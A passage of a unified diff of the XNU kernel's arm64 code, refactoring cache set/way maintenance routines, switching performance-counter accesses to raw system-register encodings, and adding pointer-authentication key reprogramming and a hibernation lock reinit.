+       segKLDDATAB      = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA);
        segPRELINKDATAB  = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_DATA", &segSizePRELINKDATA);
        segPRELINKINFOB  = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_INFO", &segSizePRELINKINFO);
        segPLKLLVMCOVB   = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PLK_LLVM_COV", &segSizePLKLLVMCOV);
@@ -1877,7 +1897,10 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
                // fileset has kext PLK_TEXT_EXEC under kernel collection TEXT_EXEC following kernel's LAST
                segKCTEXTEXECB = (vm_offset_t) getsegdatafromheader(kc_mh,             "__TEXT_EXEC", &segSizeKCTEXTEXEC);
                assert(segPLKTEXTEXECB && !segSizePLKTEXTEXEC);                        // kernel PLK_TEXT_EXEC must be empty
-               assert(segLASTB && segSizeLAST);                                       // kernel LAST must not be empty
+
+               assert(segLASTB);                                                      // kernel LAST can be empty, but it must have
+                                                                                      // a valid address for computations below.
+
                assert(segKCTEXTEXECB <= segLASTB);                                    // KC TEXT_EXEC must contain kernel LAST
                assert(segKCTEXTEXECB + segSizeKCTEXTEXEC >= segLASTB + segSizeLAST);
                segPLKTEXTEXECB = segLASTB + segSizeLAST;
index e4ac467e5ff466ee22a8a67a1067e313edab6960..3cee5ff33dfd6ececc3909d9afd9bd366a5813f0 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/mach_traps.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <arm/cpu_data_internal.h>
 #include <kern/mach_param.h>
@@ -164,7 +163,7 @@ dtrace_get_cpu_int_stack_top(void)
        return getCpuDatap()->intstack_top;
 }
 #endif /* CONFIG_DTRACE */
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 /* ARM64_TODO: remove this. still TODO?*/
 extern struct proc* current_proc(void);
index 958bc1936ae3c45ab5d64d355cce888b12a68f27..00760c9352635fcf92cce207ab243a0be9a4206f 100644 (file)
@@ -28,6 +28,7 @@
 
 #include <machine/asm.h>
 #include <arm64/proc_reg.h>
+#include <pexpert/arm64/board_config.h>
 #include <arm/pmap.h>
 #include <sys/errno.h>
 #include "assym.s"
@@ -126,16 +127,50 @@ L_ipui_done:
 .endmacro
 
 /*
- *     Detects the presence of an L2 cache and returns 1 if implemented,
- *     zero otherwise.
- *
+ * Returns the cache configuration for the specified level
  *     $0: Output register
+ *     $1: Cache level register
+ *     $2: Scratch register
  */
-.macro HAS_L2_CACHE
+.macro CACHE_AT_LEVEL
        mrs             $0, CLIDR_EL1
-       ubfx    $0, $0, #3, #3                                          // extract L2 cache Ctype
-       cmp             $0, #0x1
-       cset    $0, hi
+       add             $2, $1, $1, lsl #1
+       lsr             $0, $0, $2
+       and             $0, $0, #7                                      // extract cache type
+.endmacro
+
+/*
+ * Perform set/way maintenance to the desired cache level
+ *     $0: 'dc' set/way variant, e.g. csw or cisw
+ *     x0: maximum cache level, 0-based, inclusive
+ */
+.macro DCACHE_SET_WAY
+       dmb             sy
+       mov             x1, #0
+1:
+       CACHE_AT_LEVEL x2, x1, x3
+       cbz             x2, 5f                  // No cache at this level, all higher levels may be skipped
+       cmp             x2, #2
+       b.lt            4f                      // No data cache at this level, skip to next level
+       mov             x2, x1
+       GET_CACHE_CONFIG x2, x9, x10, x11
+       lsl             x2, x1, #1              // level field for cisw/csw, bits 1:3
+2:
+3:
+       dc              $0, x2                  // clean dcache line by way/set
+       add             x2, x2, x9              // increment set index
+       tst             x2, x10                 // look for overflow
+       b.eq            3b
+       bic             x2, x2, x10             // clear set overflow
+       adds            w2, w2, w11             // increment way
+       b.cc            2b                      // loop
+       dsb             sy                      // ensure completion of prior level maintenance
+4:
+       add             x1, x1, #1
+       cmp             x1, x0
+       b.ls            1b                      // next level
+5:
+       ret
 .endmacro
 
 /*
@@ -149,43 +184,14 @@ L_ipui_done:
        .globl EXT(clean_mmu_dcache)
 LEXT(CleanPoC_Dcache)
 #if  defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb             sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_cpcd_dcacheway:
-L_cpcd_dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpcd_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_cpcd_dcacheway                                        // loop
-
-       HAS_L2_CACHE x0
-       cbz             x0, L_cpcd_skipl2dcache
-       mov             x0, #1
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dsb             sy
-       mov             x0, #2
-L_cpcd_l2dcacheway:
-L_cpcd_l2dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpcd_l2dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_cpcd_l2dcacheway                                      // loop
-L_cpcd_skipl2dcache:
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #24, #3 // extract CLIDR_EL1.LoC
+       DCACHE_SET_WAY csw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
 
 /*
  * void CleanPoU_Dcache(void)
@@ -197,25 +203,14 @@ L_cpcd_skipl2dcache:
        .globl EXT(CleanPoU_Dcache)
 LEXT(CleanPoU_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
-       /* "Fully Coherent." */
-#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_cpud_dcacheway:
-L_cpud_dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpud_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_cpud_dcacheway                                        // loop
-       #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
        dsb sy
        ret
+       /* "Fully Coherent." */
+#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #21, 3  // extract CLIDR_EL1.LoUIS
+       DCACHE_SET_WAY csw
+#endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
 
 /*
  *     void CleanPoU_DcacheRegion(vm_offset_t va, unsigned length)
@@ -253,24 +248,30 @@ L_cpudr_loop:
        .text
        .align 2
 LEXT(CleanPoC_DcacheRegion_internal)
-       mov             x9, #((1<<MMU_CLINE)-1)
+       mov x10, #(MMU_CLINE)
+
+       /* Stash (1 << cache_line_size) in x11 for easy access. */
+       mov x11, #1
+       lsl x11, x11, x10
+
+       sub             x9, x11, #1
        and             x2, x0, x9
        bic             x0, x0, x9                                                      // Cached aligned
        add             x1, x1, x2
        sub             x1, x1, #1
-       lsr             x1, x1, #MMU_CLINE                                      // Set cache line counter
+       lsr             x1, x1, x10                                                     // Set cache line counter
        dsb             sy      
 L_cpcdr_loop:
 #if defined(APPLE_ARM64_ARCH_FAMILY)
        // It may be tempting to clean the cache (dc cvac), 
        // but see Cyclone UM 5.3.8.3 -- it's always a NOP on Cyclone.
        //
-       // Clean & Invalidate, however, will work as long as HID4.DisDCMvaOps isn't set.
+       // Clean & Invalidate, however, will work as long as S3_0_C15_C4_0.DisDCMvaOps isn't set.
        dc              civac, x0                                                       // Clean & Invalidate dcache line to PoC
 #else
        dc              cvac, x0                                                        // Clean dcache line to PoC
 #endif
-       add             x0, x0, #(1<<MMU_CLINE)                         // Get next cache aligned addr
+       add             x0, x0, x11                                                     // Get next cache aligned addr
        subs    x1, x1, #1                                                      // Decrementer cache line counter
        b.pl    L_cpcdr_loop                                            // Loop in counter not null
        dsb             sy
@@ -302,14 +303,14 @@ LEXT(CleanPoC_DcacheRegion_Force_nopreempt)
        PUSH_FRAME
        isb             sy
        ARM64_IS_PCORE x15
-       ARM64_READ_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_READ_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        and             x14, x14, (~ARM64_REG_HID4_DisDcMVAOps)
-       ARM64_WRITE_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        isb             sy
        bl              EXT(CleanPoC_DcacheRegion_internal)
        isb             sy
        orr             x14, x14, ARM64_REG_HID4_DisDcMVAOps
-       ARM64_WRITE_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        isb             sy
        POP_FRAME
        ARM64_STACK_EPILOG
@@ -351,43 +352,26 @@ LEXT(CleanPoC_DcacheRegion_Force)
        .globl EXT(FlushPoC_Dcache)
 LEXT(FlushPoC_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_fpcd_dcacheway:
-L_fpcd_dcacheline:
-       dc              cisw, x0                                                        // clean invalidate dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpcd_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpcd_dcacheway                                        // loop
-
-       HAS_L2_CACHE x0
-       cbz             x0, L_fpcd_skipl2dcache
-       dsb             sy
-       mov             x0, #1
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       mov             x0, #2
-L_fpcd_l2dcacheway:
-L_fpcd_l2dcacheline:
-       dc              cisw, x0                                                        // clean invalide dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpcd_l2dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpcd_l2dcacheway                                      // loop
-L_fpcd_skipl2dcache:
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #24, #3 // extract CLIDR_EL1.LoC
+       DCACHE_SET_WAY cisw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
+
+/*
+ *     void Flush_Dcache(void)
+ * 
+ *             Clean and invalidate D-cache, all levels
+ */
+       .text
+       .align 2
+       .globl EXT(Flush_Dcache)
+LEXT(Flush_Dcache)
+       mov x0, #6 // Maximum allowable caching level (0-based)
+       DCACHE_SET_WAY cisw 
 
 /*
  * void FlushPoU_Dcache(void)
@@ -399,25 +383,14 @@ L_fpcd_skipl2dcache:
        .globl EXT(FlushPoU_Dcache)
 LEXT(FlushPoU_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_fpud_way:
-L_fpud_line:
-       dc              cisw, x0                                                        // clean invalidate dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpud_line
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpud_way                                                      // loop
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #21, 3  // extract CLIDR_EL1.LoUIS
+       DCACHE_SET_WAY  cisw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
 
 /*
  *     void FlushPoC_DcacheRegion(vm_offset_t va, unsigned length)
index c7181aa5064bfd2ad629c9346d87b757c5a00d55..23e3d2512f46449ebc2c1663166c70cffacf224b 100644 (file)
@@ -49,8 +49,6 @@ extern int _copyout_atomic64(uint64_t u64, const char *dst);
 
 extern int copyoutstr_prevalidate(const void *kaddr, user_addr_t uaddr, size_t len);
 
-extern pmap_t kernel_pmap;
-
 extern const vm_map_address_t physmap_base;
 extern const vm_map_address_t physmap_end;
 
@@ -182,7 +180,7 @@ copy_validate(const user_addr_t user_addr, uintptr_t kernel_addr,
                         * Size of elements in the permanent zone is not saved as a part of the
                         * zone's info
                         */
-                       if (__improbable(src_zone && !src_zone->permanent &&
+                       if (__improbable(src_zone && !src_zone->z_permanent &&
                            kernel_buf_size < nbytes)) {
                                panic("copyio_preflight: kernel buffer 0x%lx has size %lu < nbytes %lu",
                                    kernel_addr, kernel_buf_size, nbytes);
index 8ba394661040fa4bfac94b395999d3784358bc74..1e0e214e66ec3bec6f95fe6a9783262a24d1c85b 100644 (file)
 #endif
 
 
+#if CSWITCH_ROP_KEYS
+       ldr             \new_key, [\thread, TH_ROP_PID]
+       REPROGRAM_ROP_KEYS      Lskip_rop_keys_\@, \new_key, \cpudatap, \tmp_key
+       mov             \wsync, #1
+Lskip_rop_keys_\@:
+#endif /* CSWITCH_ROP_KEYS */
+
+#if CSWITCH_JOP_KEYS
+       ldr             \new_key, [\thread, TH_JOP_PID]
+       REPROGRAM_JOP_KEYS      Lskip_jop_keys_\@, \new_key, \cpudatap, \tmp_key
+       mov             \wsync, #1
+Lskip_jop_keys_\@:
+#endif /* CSWITCH_JOP_KEYS */
 
        cbz             \wsync, 1f
        isb     sy
index 18fd6df99d8794e091b363b5c7ef4b4cd18ce3f4..411da56309980bfb5e9a83ef9821698ab30090ff 100644 (file)
@@ -26,7 +26,6 @@
  * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
  */
 
-#include <arm64/pac_asm.h>
 #include <pexpert/arm64/board_config.h>
 #include "assym.s"
 
index 2ed851c12fbaad7b081b6825733fd5e9d4f5317c..2c985f2f59d7d20f319a4a67a73a84cd55b1ac4a 100644 (file)
@@ -97,6 +97,9 @@ void
 pal_hib_patchup(pal_hib_ctx_t *ctx)
 {
 
+       /* Reinit the ppl hib lock as it was saved to the hibernation image held. */
+       ppl_hib_lock_reinit();
+
        // DRAM pages are captured from a PPL context, so here we restore all cpu_data structures to a non-PPL context
        for (int i = 0; i < MAX_CPUS; i++) {
                pmap_cpu_data_array[i].cpu_data.ppl_state = PPL_STATE_KERNEL;
index 973723ffc192530c50c50d092fe7bec544087469..d8e7326995339cb39763db59e7189c7ae92732c5 100644 (file)
@@ -141,37 +141,6 @@ void kpc_pmi_handler(unsigned int ctr);
 #define PMESR_EVT_ENCODE(EVT, PMC, OFF) \
        (((EVT) & PMESR_PMC_MASK) << PMESR_SHIFT(PMC, OFF))
 
-/* system registers in the CPMU */
-
-#define SREG_PMCR0  "S3_1_c15_c0_0"
-#define SREG_PMCR1  "S3_1_c15_c1_0"
-#define SREG_PMCR2  "S3_1_c15_c2_0"
-#define SREG_PMCR3  "S3_1_c15_c3_0"
-#define SREG_PMCR4  "S3_1_c15_c4_0"
-#define SREG_PMESR0 "S3_1_c15_c5_0"
-#define SREG_PMESR1 "S3_1_c15_c6_0"
-#define SREG_PMSR   "S3_1_c15_c13_0"
-#define SREG_OPMAT0 "S3_1_c15_c7_0"
-#define SREG_OPMAT1 "S3_1_c15_c8_0"
-#define SREG_OPMSK0 "S3_1_c15_c9_0"
-#define SREG_OPMSK1 "S3_1_c15_c10_0"
-
-#define SREG_PMC0 "S3_2_c15_c0_0"
-#define SREG_PMC1 "S3_2_c15_c1_0"
-#define SREG_PMC2 "S3_2_c15_c2_0"
-#define SREG_PMC3 "S3_2_c15_c3_0"
-#define SREG_PMC4 "S3_2_c15_c4_0"
-#define SREG_PMC5 "S3_2_c15_c5_0"
-#define SREG_PMC6 "S3_2_c15_c6_0"
-#define SREG_PMC7 "S3_2_c15_c7_0"
-#define SREG_PMC8 "S3_2_c15_c9_0"
-#define SREG_PMC9 "S3_2_c15_c10_0"
-
-#define SREG_PMMMAP   "S3_2_c15_c15_0"
-#define SREG_PMTRHLD2 "S3_2_c15_c14_0"
-#define SREG_PMTRHLD4 "S3_2_c15_c13_0"
-#define SREG_PMTRHLD6 "S3_2_c15_c12_0"
-
 /*
  * The low 8 bits of a configuration words select the event to program on
  * PMESR{0,1}. Bits 16-19 are mapped to PMCR1 bits.
@@ -318,26 +287,26 @@ static void
 dump_regs(void)
 {
        uint64_t val;
-       kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR0));
-       kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR1));
-       kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR2));
-       kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR3));
-       kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR4));
-       kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR0));
-       kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR1));
-
-       kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC0));
-       kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC1));
-       kprintf("PMC2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC2));
-       kprintf("PMC3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC3));
-       kprintf("PMC4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC4));
-       kprintf("PMC5 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC5));
-       kprintf("PMC6 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC6));
-       kprintf("PMC7 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC7));
+       kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C0_0"));
+       kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C1_0"));
+       kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C2_0"));
+       kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C3_0"));
+       kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C4_0"));
+       kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C5_0"));
+       kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C6_0"));
+
+       kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ("PMC0"));
+       kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ("PMC1"));
+       kprintf("S3_2_C15_C2_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C2_0"));
+       kprintf("S3_2_C15_C3_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C3_0"));
+       kprintf("S3_2_C15_C4_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C4_0"));
+       kprintf("S3_2_C15_C5_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C5_0"));
+       kprintf("S3_2_C15_C6_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C6_0"));
+       kprintf("S3_2_C15_C7_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C7_0"));
 
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       kprintf("PMC8 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC8));
-       kprintf("PMC9 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC9));
+       kprintf("S3_2_C15_C9_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C9_0"));
+       kprintf("S3_2_C15_C10_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C10_0"));
 #endif
 }
 #endif
@@ -348,7 +317,7 @@ enable_counter(uint32_t counter)
        uint64_t pmcr0 = 0;
        boolean_t counter_running, pmi_enabled, enabled;
 
-       pmcr0 = SREG_READ(SREG_PMCR0) | 0x3 /* leave the fixed counters enabled for monotonic */;
+       pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3 /* leave the fixed counters enabled for monotonic */;
 
        counter_running = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0;
        pmi_enabled = (pmcr0 & PMCR0_PMI_ENABLE_MASK(counter)) != 0;
@@ -358,7 +327,7 @@ enable_counter(uint32_t counter)
        if (!enabled) {
                pmcr0 |= PMCR0_PMC_ENABLE_MASK(counter);
                pmcr0 |= PMCR0_PMI_ENABLE_MASK(counter);
-               SREG_WRITE(SREG_PMCR0, pmcr0);
+               SREG_WRITE("S3_1_C15_C0_0", pmcr0);
        }
 
        return enabled;
@@ -374,12 +343,12 @@ disable_counter(uint32_t counter)
                return true;
        }
 
-       pmcr0 = SREG_READ(SREG_PMCR0) | 0x3;
+       pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3;
        enabled = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0;
 
        if (enabled) {
                pmcr0 &= PMCR0_PMC_DISABLE_MASK(counter);
-               SREG_WRITE(SREG_PMCR0, pmcr0);
+               SREG_WRITE("S3_1_C15_C0_0", pmcr0);
        }
 
        return enabled;
@@ -418,11 +387,11 @@ set_modes(uint32_t counter, kpc_config_t cfgword)
                bits = PMCR1_EL_ALL_ENABLE_MASK(counter);
        }
 
-       uint64_t pmcr1 = SREG_READ(SREG_PMCR1);
+       uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0");
        pmcr1 &= PMCR1_EL_ALL_DISABLE_MASK(counter);
        pmcr1 |= bits;
        pmcr1 |= 0x30303; /* monotonic compatibility */
-       SREG_WRITE(SREG_PMCR1, pmcr1);
+       SREG_WRITE("S3_1_C15_C1_0", pmcr1);
        saved_PMCR[cpuid][1] = pmcr1;
 }
 
@@ -430,17 +399,17 @@ static uint64_t
 read_counter(uint32_t counter)
 {
        switch (counter) {
-       // case 0: return SREG_READ(SREG_PMC0);
-       // case 1: return SREG_READ(SREG_PMC1);
-       case 2: return SREG_READ(SREG_PMC2);
-       case 3: return SREG_READ(SREG_PMC3);
-       case 4: return SREG_READ(SREG_PMC4);
-       case 5: return SREG_READ(SREG_PMC5);
-       case 6: return SREG_READ(SREG_PMC6);
-       case 7: return SREG_READ(SREG_PMC7);
+       // case 0: return SREG_READ("PMC0");
+       // case 1: return SREG_READ("PMC1");
+       case 2: return SREG_READ("S3_2_C15_C2_0");
+       case 3: return SREG_READ("S3_2_C15_C3_0");
+       case 4: return SREG_READ("S3_2_C15_C4_0");
+       case 5: return SREG_READ("S3_2_C15_C5_0");
+       case 6: return SREG_READ("S3_2_C15_C6_0");
+       case 7: return SREG_READ("S3_2_C15_C7_0");
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       case 8: return SREG_READ(SREG_PMC8);
-       case 9: return SREG_READ(SREG_PMC9);
+       case 8: return SREG_READ("S3_2_C15_C9_0");
+       case 9: return SREG_READ("S3_2_C15_C10_0");
 #endif
        default: return 0;
        }
@@ -450,17 +419,17 @@ static void
 write_counter(uint32_t counter, uint64_t value)
 {
        switch (counter) {
-       // case 0: SREG_WRITE(SREG_PMC0, value); break;
-       // case 1: SREG_WRITE(SREG_PMC1, value); break;
-       case 2: SREG_WRITE(SREG_PMC2, value); break;
-       case 3: SREG_WRITE(SREG_PMC3, value); break;
-       case 4: SREG_WRITE(SREG_PMC4, value); break;
-       case 5: SREG_WRITE(SREG_PMC5, value); break;
-       case 6: SREG_WRITE(SREG_PMC6, value); break;
-       case 7: SREG_WRITE(SREG_PMC7, value); break;
+       // case 0: SREG_WRITE("PMC0", value); break;
+       // case 1: SREG_WRITE("PMC1", value); break;
+       case 2: SREG_WRITE("S3_2_C15_C2_0", value); break;
+       case 3: SREG_WRITE("S3_2_C15_C3_0", value); break;
+       case 4: SREG_WRITE("S3_2_C15_C4_0", value); break;
+       case 5: SREG_WRITE("S3_2_C15_C5_0", value); break;
+       case 6: SREG_WRITE("S3_2_C15_C6_0", value); break;
+       case 7: SREG_WRITE("S3_2_C15_C7_0", value); break;
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       case 8: SREG_WRITE(SREG_PMC8, value); break;
-       case 9: SREG_WRITE(SREG_PMC9, value); break;
+       case 8: SREG_WRITE("S3_2_C15_C9_0", value); break;
+       case 9: SREG_WRITE("S3_2_C15_C10_0", value); break;
 #endif
        default: break;
        }
@@ -475,18 +444,18 @@ kpc_rawpmu_config_count(void)
 int
 kpc_get_rawpmu_config(kpc_config_t *configv)
 {
-       configv[0] = SREG_READ(SREG_PMCR2);
-       configv[1] = SREG_READ(SREG_PMCR3);
-       configv[2] = SREG_READ(SREG_PMCR4);
-       configv[3] = SREG_READ(SREG_OPMAT0);
-       configv[4] = SREG_READ(SREG_OPMAT1);
-       configv[5] = SREG_READ(SREG_OPMSK0);
-       configv[6] = SREG_READ(SREG_OPMSK1);
+       configv[0] = SREG_READ("S3_1_C15_C2_0");
+       configv[1] = SREG_READ("S3_1_C15_C3_0");
+       configv[2] = SREG_READ("S3_1_C15_C4_0");
+       configv[3] = SREG_READ("S3_1_C15_C7_0");
+       configv[4] = SREG_READ("S3_1_C15_C8_0");
+       configv[5] = SREG_READ("S3_1_C15_C9_0");
+       configv[6] = SREG_READ("S3_1_C15_C10_0");
 #if RAWPMU_CONFIG_COUNT > 7
-       configv[7] = SREG_READ(SREG_PMMMAP);
-       configv[8] = SREG_READ(SREG_PMTRHLD2);
-       configv[9] = SREG_READ(SREG_PMTRHLD4);
-       configv[10] = SREG_READ(SREG_PMTRHLD6);
+       configv[7] = SREG_READ("S3_2_C15_C15_0");
+       configv[8] = SREG_READ("S3_2_C15_C14_0");
+       configv[9] = SREG_READ("S3_2_C15_C13_0");
+       configv[10] = SREG_READ("S3_2_C15_C12_0");
 #endif
        return 0;
 }
@@ -494,18 +463,18 @@ kpc_get_rawpmu_config(kpc_config_t *configv)
 static int
 kpc_set_rawpmu_config(kpc_config_t *configv)
 {
-       SREG_WRITE(SREG_PMCR2, configv[0]);
-       SREG_WRITE(SREG_PMCR3, configv[1]);
-       SREG_WRITE(SREG_PMCR4, configv[2]);
-       SREG_WRITE(SREG_OPMAT0, configv[3]);
-       SREG_WRITE(SREG_OPMAT1, configv[4]);
-       SREG_WRITE(SREG_OPMSK0, configv[5]);
-       SREG_WRITE(SREG_OPMSK1, configv[6]);
+       SREG_WRITE("S3_1_C15_C2_0", configv[0]);
+       SREG_WRITE("S3_1_C15_C3_0", configv[1]);
+       SREG_WRITE("S3_1_C15_C4_0", configv[2]);
+       SREG_WRITE("S3_1_C15_C7_0", configv[3]);
+       SREG_WRITE("S3_1_C15_C8_0", configv[4]);
+       SREG_WRITE("S3_1_C15_C9_0", configv[5]);
+       SREG_WRITE("S3_1_C15_C10_0", configv[6]);
 #if RAWPMU_CONFIG_COUNT > 7
-       SREG_WRITE(SREG_PMMMAP, configv[7]);
-       SREG_WRITE(SREG_PMTRHLD2, configv[8]);
-       SREG_WRITE(SREG_PMTRHLD4, configv[9]);
-       SREG_WRITE(SREG_PMTRHLD6, configv[10]);
+       SREG_WRITE("S3_2_C15_C15_0", configv[7]);
+       SREG_WRITE("S3_2_C15_C14_0", configv[8]);
+       SREG_WRITE("S3_2_C15_C13_0", configv[9]);
+       SREG_WRITE("S3_2_C15_C12_0", configv[10]);
 #endif
        return 0;
 }
@@ -520,13 +489,13 @@ save_regs(void)
        assert(ml_get_interrupts_enabled() == FALSE);
 
        /* Save event selections. */
-       saved_PMESR[cpuid][0] = SREG_READ(SREG_PMESR0);
-       saved_PMESR[cpuid][1] = SREG_READ(SREG_PMESR1);
+       saved_PMESR[cpuid][0] = SREG_READ("S3_1_C15_C5_0");
+       saved_PMESR[cpuid][1] = SREG_READ("S3_1_C15_C6_0");
 
        kpc_get_rawpmu_config(saved_RAWPMU[cpuid]);
 
        /* Disable the counters. */
-       // SREG_WRITE(SREG_PMCR0, clear);
+       // SREG_WRITE("S3_1_C15_C0_0", clear);
 
        /* Finally, save state for each counter*/
        for (int i = 2; i < KPC_ARM64_PMC_COUNT; i++) {
@@ -540,8 +509,8 @@ restore_regs(void)
        int cpuid = cpu_number();
 
        /* Restore PMESR values. */
-       SREG_WRITE(SREG_PMESR0, saved_PMESR[cpuid][0]);
-       SREG_WRITE(SREG_PMESR1, saved_PMESR[cpuid][1]);
+       SREG_WRITE("S3_1_C15_C5_0", saved_PMESR[cpuid][0]);
+       SREG_WRITE("S3_1_C15_C6_0", saved_PMESR[cpuid][1]);
 
        kpc_set_rawpmu_config(saved_RAWPMU[cpuid]);
 
@@ -551,7 +520,7 @@ restore_regs(void)
        }
 
        /* Restore PMCR0/1 values (with PMCR0 last to enable). */
-       SREG_WRITE(SREG_PMCR1, saved_PMCR[cpuid][1] | 0x30303);
+       SREG_WRITE("S3_1_C15_C1_0", saved_PMCR[cpuid][1] | 0x30303);
 }
 
 static uint64_t
